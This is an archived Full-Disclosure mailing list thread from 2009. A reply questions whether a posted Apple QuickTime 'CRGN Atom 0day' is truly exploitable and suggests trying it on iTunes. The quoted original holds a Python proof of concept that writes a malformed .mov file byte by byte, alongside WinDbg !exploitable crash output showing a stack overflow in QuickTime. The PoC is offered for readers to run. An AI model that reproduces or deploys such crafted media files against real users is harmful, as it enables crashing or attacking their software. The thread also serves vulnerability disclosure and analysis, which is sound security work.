lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Mon, 15 Jun 2009 23:18:56 -0400
From: laurent gaffie <laurent.gaffie@...il.com>
To: webDEViL <w3bd3vil@...il.com>, full-disclosure@...ts.grok.org.uk
Subject: Re: Apple QuickTime 0day

Hi WebDEVIL,

You base your PoC on this plugin (http://www.codeplex.com/msecdbg) for
windbg (as copy/pasted), but i wonder, what make you think it's really
exploitable (on quicktime) ?
Have you tried that PoC on Itunes ?
Itunes, use Quicktime as a module to read .mov files, but Itunes doesn't
have the same memory protection than Quicktime, for example see :
http://milw0rm.com/exploits/7296 , it still works on the last one today
[Itunes 8.2.0.23]

What do you get with your Poc when you play with it on Itunes ?

Thanks





2009/6/15 webDEViL <w3bd3vil@...il.com>

> Try it with your latest quicktime player.
> --------------------------------------------------------------
>
> #0:000> !exploitable -v
> #HostMachine\HostUser
> #Executing Processor Architecture is x86
>
> #Debuggee is in User Mode
> #Debuggee is a live user mode debugging session on the local machine
> #Event Type: Exception
> #Exception Faulting Address: 0x66830f9b
> #First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC00000FD)
>
> #
> #Faulting Instruction:66830f9b push ebx
> #
> #Basic Block:
> #    66830f9b push ebx
> #       Tainted Input Operands: ebx
> #    66830f9c push ebp
> #    66830f9d mov ebp,dword ptr <unloaded_papi.dll>+0x41f (00000420)[esp]
>
> #    66830fa4 push esi
> #    66830fa5 push edi
> #    66830fa6 mov edi,ecx
> #    66830fa8 cmp edi,offset <unloaded_papi.dll>+0x5ff (00000600)
> #    66830fae mov ebx,edx
> #    66830fb0 mov dword ptr [esp+14h],eax
>
> #    66830fb4 mov byte ptr [esp+10h],0
> #    66830fb9 mov byte ptr [esp+11h],0
> #    66830fbe mov byte ptr [esp+12h],0
> #    66830fc3 je quicktime!dllmain+0x2fbc4 (668310a4)
> #
> #Exception Hash (Major/Minor): 0x614b6671.0x614b786e
>
> #
> #Stack Trace:
> #QuickTime!DllMain+0x2fabb
> #<Unloaded_papi.dll>+0x1231137
> #Instruction Address: 0x66830f9b
> #
> #Description: Stack Overflow
> #Short Description: StackOverflow
> #Exploitability Classification: UNKNOWN
>
> #Recommended Bug Title: Stack Overflow starting at QuickTime!DllMain+0x2fabb (Hash=0x614b6671.0x614b786e)
>
> print "------------------------------"
> print "w3bd3vil [at] gmail [dot] com"
> print "Apple QuickTime CRGN Atom 0day"
>
> print "------------------------------"
> bytes = [
> 0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70, 0x33, 0x67, 0x70,
> 0x35, 0x00, 0x00, 0x01, 0x00, 0x33, 0x67, 0x70, 0x35, 0x33, 0x67,
> 0x70, 0x34, 0x00, 0x00, 0x01, 0x16, 0x6D, 0x6F, 0x6F, 0x76, 0x00,
>
> 0x00, 0x00, 0x6C, 0x6D, 0x76, 0x68, 0x64, 0x00, 0x00, 0x00, 0x00,
> 0xBF, 0x88, 0x12, 0x28, 0xBF, 0x88, 0x12, 0x28, 0x00, 0x00, 0x02,
> 0x58, 0x00, 0x00, 0x0B, 0x90, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
>
> 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
>
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00,
> 0xA2, 0x74, 0x72, 0x61, 0x6B, 0x00, 0x00, 0x00, 0x5C, 0x74, 0x6B,
> 0x68, 0x64, 0x00, 0x00, 0x00, 0x01, 0xBF, 0x88, 0x12, 0x28, 0xBF,
>
> 0x88, 0x12, 0x28, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x0B, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
>
> 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00,
> 0x00, 0x00, 0xB0, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x1A, 0x63, 0x6C, 0x69, 0x70, 0x00, 0x00, 0x00, 0x0E, 0x63,
>
> 0x72, 0x67, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x24, 0x65, 0x64, 0x74, 0x73, 0x00,
> 0x00, 0x00, 0x1c, 0x65, 0x6c, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0b, 0x90, 0x00, 0x00, 0x00,
>
> 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72,
> 0x65, 0x65, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 0x65, 0x65 ]
>
> f = open("webDEViL.mov", "wb")
> for byte in bytes: f.write("%c" % byte)
>
> f.close()
> print "webDEViL.mov created! (%d bytes)" % len(bytes)
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ